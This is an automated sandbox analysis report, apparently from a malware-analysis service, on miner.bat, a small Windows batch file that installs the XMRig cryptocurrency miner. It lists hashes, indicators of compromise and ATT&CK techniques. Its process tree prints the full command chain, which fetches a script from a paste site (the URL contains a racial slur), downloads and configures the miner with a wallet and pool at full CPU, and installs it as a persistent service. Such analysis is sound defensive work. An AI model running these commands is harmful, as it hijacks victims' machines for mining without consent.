xmrig | c2d6f3cf4a462b03e9d0db53f41cee7ab3ec7ee6045492f52851392d874c609e

Analysis

max time kernel
1048s
max time network
1050s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
07/06/2024, 17:05

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

miner.bat
Size

169B
MD5

abfbeeced32bf0a03b8b0ceeea21e771
SHA1

ccf3673a38497264821bfe9d67a97cc8af444915
SHA256

c2d6f3cf4a462b03e9d0db53f41cee7ab3ec7ee6045492f52851392d874c609e
SHA512

f2fb9f61d5f420271ab531e5b3829a1646a00b8a116a8759a4a88709d227f409e7545166284ad4a4cc0e0eac28473e633caee697d2432b412a63504bb404fa03

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 47 IoCs

miner

resource	yara_rule
behavioral2/files/0x000100000002a9b1-47.dat	family_xmrig
behavioral2/files/0x000100000002a9b1-47.dat	xmrig
behavioral2/memory/2080-50-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-173-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-174-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-175-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-176-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-177-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-178-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-179-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-180-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-181-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-182-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-183-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-184-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-185-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-186-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-187-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-188-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-189-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-190-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-191-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-192-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-193-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-194-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-195-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-196-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-197-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-198-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-199-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-200-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-201-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-202-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-203-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-205-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-206-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-207-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-210-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-211-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-212-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-213-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-220-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-221-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-222-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-229-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-230-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4428-231-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
7	1636	powershell.exe
9	1884	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
2080	xmrig.exe
2188	nssm.exe
3780	nssm.exe
748	nssm.exe
4368	nssm.exe
4744	nssm.exe
2220	nssm.exe
4208	nssm.exe
4428	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
3	raw.githubusercontent.com
7	raw.githubusercontent.com
9	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4400	sc.exe
2284	sc.exe
460	sc.exe
436	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1884	powershell.exe
1636	powershell.exe
388	powershell.exe
4252	powershell.exe
3436	powershell.exe
4100	powershell.exe
2988	powershell.exe
2848	powershell.exe
2428	powershell.exe
3632	powershell.exe
3484	powershell.exe
412	powershell.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2820	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
1636	powershell.exe
1636	powershell.exe
388	powershell.exe
388	powershell.exe
2848	powershell.exe
2848	powershell.exe
4252	powershell.exe
4252	powershell.exe
2428	powershell.exe
2428	powershell.exe
3436	powershell.exe
3436	powershell.exe
4100	powershell.exe
4100	powershell.exe
3632	powershell.exe
3632	powershell.exe
2988	powershell.exe
2988	powershell.exe
3484	powershell.exe
3484	powershell.exe
1884	powershell.exe
1884	powershell.exe
412	powershell.exe
412	powershell.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	2820	taskkill.exe
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeDebugPrivilege	388	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	4252	powershell.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeDebugPrivilege	4100	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	2988	powershell.exe
Token: SeDebugPrivilege	3484	powershell.exe
Token: SeDebugPrivilege	1884	powershell.exe
Token: SeDebugPrivilege	412	powershell.exe
Token: SeLockMemoryPrivilege	4428	xmrig.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4428	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2932 wrote to memory of 836	2932	cmd.exe	78
PID 2932 wrote to memory of 836	2932	cmd.exe	78
PID 2932 wrote to memory of 5084	2932	cmd.exe	79
PID 2932 wrote to memory of 5084	2932	cmd.exe	79
PID 5084 wrote to memory of 2732	5084	net.exe	80
PID 5084 wrote to memory of 2732	5084	net.exe	80
PID 2932 wrote to memory of 460	2932	cmd.exe	81
PID 2932 wrote to memory of 460	2932	cmd.exe	81
PID 2932 wrote to memory of 1916	2932	cmd.exe	82
PID 2932 wrote to memory of 1916	2932	cmd.exe	82
PID 2932 wrote to memory of 3192	2932	cmd.exe	83
PID 2932 wrote to memory of 3192	2932	cmd.exe	83
PID 2932 wrote to memory of 3176	2932	cmd.exe	84
PID 2932 wrote to memory of 3176	2932	cmd.exe	84
PID 2932 wrote to memory of 4012	2932	cmd.exe	85
PID 2932 wrote to memory of 4012	2932	cmd.exe	85
PID 2932 wrote to memory of 4400	2932	cmd.exe	86
PID 2932 wrote to memory of 4400	2932	cmd.exe	86
PID 2932 wrote to memory of 2284	2932	cmd.exe	87
PID 2932 wrote to memory of 2284	2932	cmd.exe	87
PID 2932 wrote to memory of 2820	2932	cmd.exe	88
PID 2932 wrote to memory of 2820	2932	cmd.exe	88
PID 2932 wrote to memory of 1636	2932	cmd.exe	90
PID 2932 wrote to memory of 1636	2932	cmd.exe	90
PID 2932 wrote to memory of 388	2932	cmd.exe	91
PID 2932 wrote to memory of 388	2932	cmd.exe	91
PID 2932 wrote to memory of 2848	2932	cmd.exe	92
PID 2932 wrote to memory of 2848	2932	cmd.exe	92
PID 2932 wrote to memory of 2080	2932	cmd.exe	93
PID 2932 wrote to memory of 2080	2932	cmd.exe	93
PID 2932 wrote to memory of 2200	2932	cmd.exe	94
PID 2932 wrote to memory of 2200	2932	cmd.exe	94
PID 2200 wrote to memory of 4252	2200	cmd.exe	95
PID 2200 wrote to memory of 4252	2200	cmd.exe	95
PID 4252 wrote to memory of 1132	4252	powershell.exe	96
PID 4252 wrote to memory of 1132	4252	powershell.exe	96
PID 2932 wrote to memory of 2428	2932	cmd.exe	97
PID 2932 wrote to memory of 2428	2932	cmd.exe	97
PID 2932 wrote to memory of 3436	2932	cmd.exe	98
PID 2932 wrote to memory of 3436	2932	cmd.exe	98
PID 2932 wrote to memory of 4100	2932	cmd.exe	99
PID 2932 wrote to memory of 4100	2932	cmd.exe	99
PID 2932 wrote to memory of 3632	2932	cmd.exe	100
PID 2932 wrote to memory of 3632	2932	cmd.exe	100
PID 2932 wrote to memory of 2988	2932	cmd.exe	101
PID 2932 wrote to memory of 2988	2932	cmd.exe	101
PID 2932 wrote to memory of 3484	2932	cmd.exe	102
PID 2932 wrote to memory of 3484	2932	cmd.exe	102
PID 2932 wrote to memory of 1884	2932	cmd.exe	103
PID 2932 wrote to memory of 1884	2932	cmd.exe	103
PID 2932 wrote to memory of 412	2932	cmd.exe	104
PID 2932 wrote to memory of 412	2932	cmd.exe	104
PID 2932 wrote to memory of 460	2932	cmd.exe	105
PID 2932 wrote to memory of 460	2932	cmd.exe	105
PID 2932 wrote to memory of 436	2932	cmd.exe	106
PID 2932 wrote to memory of 436	2932	cmd.exe	106
PID 2932 wrote to memory of 2188	2932	cmd.exe	107
PID 2932 wrote to memory of 2188	2932	cmd.exe	107
PID 2932 wrote to memory of 3780	2932	cmd.exe	108
PID 2932 wrote to memory of 3780	2932	cmd.exe	108
PID 2932 wrote to memory of 748	2932	cmd.exe	109
PID 2932 wrote to memory of 748	2932	cmd.exe	109
PID 2932 wrote to memory of 4368	2932	cmd.exe	110
PID 2932 wrote to memory of 4368	2932	cmd.exe	110

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\miner.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2932
- C:\Windows\system32\curl.exe
  curl -o s.bat https://rentry.co/idiotnigger/raw/
  2⤵
  PID:836
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5084
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2732
- C:\Windows\system32\where.exe
  where powershell
  2⤵
  PID:460
- C:\Windows\system32\where.exe
  where find
  2⤵
  PID:1916
- C:\Windows\system32\where.exe
  where findstr
  2⤵
  PID:3192
- C:\Windows\system32\where.exe
  where tasklist
  2⤵
  PID:3176
- C:\Windows\system32\where.exe
  where sc
  2⤵
  PID:4012
- C:\Windows\system32\sc.exe
  sc stop moneroocean_miner
  2⤵
  - Launches sc.exe
  PID:4400
- C:\Windows\system32\sc.exe
  sc delete moneroocean_miner
  2⤵
  - Launches sc.exe
  PID:2284
- C:\Windows\system32\taskkill.exe
  taskkill /f /t /im xmrig.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2820
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2848
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe" --help
  2⤵
  - Executes dropped EXE
  PID:2080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2200
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4252
  - - C:\Windows\system32\HOSTNAME.EXE
      "C:\Windows\system32\HOSTNAME.EXE"
      4⤵
      PID:1132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2428
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Gnmgpfvo\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1884
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:412
- C:\Windows\system32\sc.exe
  sc stop moneroocean_miner
  2⤵
  - Launches sc.exe
  PID:460
- C:\Windows\system32\sc.exe
  sc delete moneroocean_miner
  2⤵
  - Launches sc.exe
  PID:436
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  PID:2188
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
  2⤵
  - Executes dropped EXE
  PID:3780
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
  2⤵
  - Executes dropped EXE
  PID:748
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
  2⤵
  - Executes dropped EXE
  PID:4368
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
  2⤵
  - Executes dropped EXE
  PID:4744
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
  2⤵
  - Executes dropped EXE
  PID:2220

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:4208
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4428

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9c641493f463ea0f418e229be7b384ad

SHA1
c2e41f792970c65a36869125304956e1ff2c4727

SHA256
b846abd32e1d5976dedf646cf4af48aa83e7a44fa2ec49ca69bba79e5a54633d

SHA512
c3746ab0f9c0d4f01ac396d8a516d2c65e513820222fd0b9a54c9ae7b0faf1f91b54fa3153f62312e96d6e76b334e42f1f9c97f630c50ecb519642332619308b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
077a134bc7a746a73e196534173153c0

SHA1
78c99d95f4a34b976d19c001350948425f2ae7f5

SHA256
f8a2fa7a0351c405e21bd245b46f7e1427da647061aabca8ff166f417e93b283

SHA512
0d62123578d11b463b3aa5bd4af67528026e666a32ace37ea5d49efe1171b41a3a57fad12a501b4953bf59bc08f430f63ffea173e8200e4218f2cb099a157b14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e1faac20cf49b8c61fb47b404d5d42e0

SHA1
6e61e9d55a081ac6b755a00e88e0f1cb83dad68f

SHA256
b53bd6ebc1b41c29f49b4bec726fab5ed85cfaacb2456f8c157b1a8c8b1cefaf

SHA512
d9d275acda03c8b7751877951c8bcdf024cd7277771b7a1787d183832fa1838c1fce9072000aca1b48460904751969292166913bc5e5ed5cd22d9ed556506fdf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
90ece7fdd319af178ba25de3b361bb2c

SHA1
f4ff3132005ab04fefe6dadf5616b1b424144e52

SHA256
b88359d2d33ebb3749dde349e80deb6278ca915a1c9dc324b7f17d965f1a351d

SHA512
76859d72c4cc3da9c2ddebb58d1bee29e495360753df1cbdc10710d9cca3140a966bdc5e1f7c1fafbe7a423df710b493b520684897e68e35eb329f12dc32f385

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
20dc399a9a94bdfd9be4ae5b710c7342

SHA1
2e646530557f3e79e9fd43595307824d69d13d61

SHA256
bc03c4b492e039fbac81f800916c21a68824fa514f276e2ac324b42edaeabe77

SHA512
614432109f8800c1a85aca5a859b45822b6c7092605494d0d494c3c217dda0c5c56c13220b77b071307fc30f8f6392954ce30df963ec5806f88243669123a84e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ecf2f2c2b4293aca091a6b61b8ec34a7

SHA1
06d9fda066eb643974025957273aa55ec3927a0b

SHA256
88842d93225200bd61ef1d68fed5f8c910dfd0217a59f0be9322918bab54232d

SHA512
d664aee71f6dae4d81b0141194b21a6ca5023e5b6e969c95ffc9c0a71ad7b6e1e773895bb66a9399b39982d6f5fd7974b0d5a566fc11224f038032c78dfc5716

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bcd6c8e0258831ffaa982d69f8beb834

SHA1
1106aa7254dfec38522a77d196826dc09526272f

SHA256
992d94917f54a045a4dde3304c94480958cbe8311d7c66937c5a7e4ebc0012b9

SHA512
4919eaccae6c9dfc98bb085abeb8a7cfeeb17224443553971cce242782ba10b01e329b942165a648bce91f484f1782c4567196fe47044eba6eb28964e981563d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
580e54f6cbd7d4def8ca5cd0b5568710

SHA1
69199f15caea8b7a40fc2e546135e025c10fa243

SHA256
f73c8f2a56c4b778d9ae1632e37e4e7e7de7ab4b79645d524d0f255be6edfc6d

SHA512
bc8fac2d5cde35144c39a432e1b9d8fac1f1af141c72c6c35b0def5e04ef17fa6c954f9e40f02c1cb497a2b08b13e2a84e72375952575df4d166cd5c554ab55d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e150e00b4c403ea0a47e60dff2bbc574

SHA1
8ee1ecde92f4e232cd2d486b170303515961167d

SHA256
32c23afede692bfb5a0327282a5f7b86b094ee4b23b99da7d5f5b0907248116a

SHA512
fe1a85b51fb177b2f3fbfd63120822b1c48345b7bafa0d4579a357f0be6107d1708c468e669d6e64cafaa65c56803b4d20a487364a980b2d04071aadc1217a3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8a424e81b5a6078deff05e153c04a0ee

SHA1
bf209de0dbc1dbe7c5b5b511bd34bf447a3c049b

SHA256
79ce6d6caea4a9eabf8fdbb2a1c58d43fb5a3c500c2dec3fce87c160d2c6bda3

SHA512
aa01195e5c1d641304b08fed4a3bffc916972aa0bc20e928204cef1783f38922a03b761cf2010ccbace1ea0d2f18cda4eaeee4d8969f32fbae5f580e4e38522d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
71de3d4e6a902c41e5d87b031a5a1910

SHA1
38da8e3af858eb6ad51af0aca573ed73c244cb21

SHA256
19c786a0d1be5f808940dfb0bfcdf3e78a1e4881cb326fabe044b9c7c2970466

SHA512
c3811686eead6874ad81483349e693e1ba89ef4c38d001cfdc5e49c5085d13649940a623a2e3cfd12d3ff887e6d12c11b3a832b09e00577d623cf4d7c03f7554

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
af455ee5251ed2e4195180f2a562509b

SHA1
7296a407e1a233ee1a141ed52fe7f1615a7c6b7b

SHA256
a12eb786102ebec02a1d7b3a1b31bc0cec298f819c2afff69b6d01805b333dce

SHA512
6caad27f58013cf12f2973257f1328c73b16f31d6248daee8bc417560b390f98cbc97df96d3319c240ea95dd0acf42e9c251ea7fdd4e0277f0ca661797dfb251

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b4c43wxb.owk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\s.bat

Filesize
14KB

MD5
12a235844829126b56d90f5ff606c555

SHA1
7fed9b9b08a9849dd61f32a6d731e5dd2f94ccc8

SHA256
dfb89d7d439866741417e5aaee451488036f3d4aff806bf6d448fadeefa717ab

SHA512
ad72e804d21b3acad05476e02c43d80b4d627d7ac5d6a7ae315a58e7cd34cb0b0560182526839e622bcf13c48c1549e1e331a3b7799fdd1438cb471e556ee62a

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
e706633c59bab95247426ca3d968a8f8

SHA1
50f25d3e278e1e093e6f1388f1519e2138c85e58

SHA256
5332f10d6bf13d9580bc2bd74b04769a0a5fc4d90ec1f3f491eff089bcdbaa17

SHA512
a69d7485c2f49dc141aae61b76d38d20f63e1f37d4d51de9bd10350cbb144c1dce8cbf9aa0e45d3eef2385e9a09f9c1eff018b40bea1e326c3493f7f2773ffca

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
296ee1a95c43fec80c7712bc2086aa97

SHA1
5f23e7cdbebf8e67e166a4cef9ac78ed328a5f23

SHA256
ff88c8547786e8565acbe10e28b9da1f813602912c83a140a1d1ecd4ac340129

SHA512
6b737620063323e05bd6f8b995b6cf19ecd25c17bd95dc4480d71ed31c614e017aa88548ed8a7858914a6e197e2d4826c2815508da504051ec311f3642005326

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
